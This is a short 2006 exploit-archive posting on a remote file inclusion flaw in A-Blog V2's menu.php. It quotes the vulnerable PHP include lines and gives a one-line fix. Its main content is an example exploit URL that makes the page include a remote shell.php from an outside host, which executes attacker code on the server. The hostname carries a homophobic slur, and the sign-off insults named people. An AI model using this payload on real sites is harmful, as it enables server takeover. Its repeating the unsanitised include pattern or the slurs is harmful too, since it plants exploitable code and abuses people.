A-Blog V2 (menu.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : A-Blog V2 (menu.php) Remote File Include Vulnerability
# Published : 2006-09-26
# Author : Drago84
# Previous Title : WEB//NEWS <= 1.4 (parser.php) Remote File Include Vulnerability
# Next Title : paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include Exploit

###### ToXiC #########################
#
#A-Blog Remote File Include
#
#BuG FounD by Drago84
#
#Application Affect:A-Blog
#Source Code:
#http://prdownloads.sourceforge.net/a-blog/A-BlogV2.rar?download
#Problem:
#<?php include ("$navigation_start"); ?>
#<?php include("$navigation_middle"); ?>
#Soluction:
#Include in page require ("mainfile.php");
#Page Vulnerable : menu.php
#Dir : /navigation/
# Exempe Of ExPloit
is:
#http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?

#GrEatZ All Member of ToXiC, Str0ke
# Fuck Sonic,a|x
# ToXic Security Italian CreW

######
ToXiC
###################

# www.Syue.com [2006-09-26]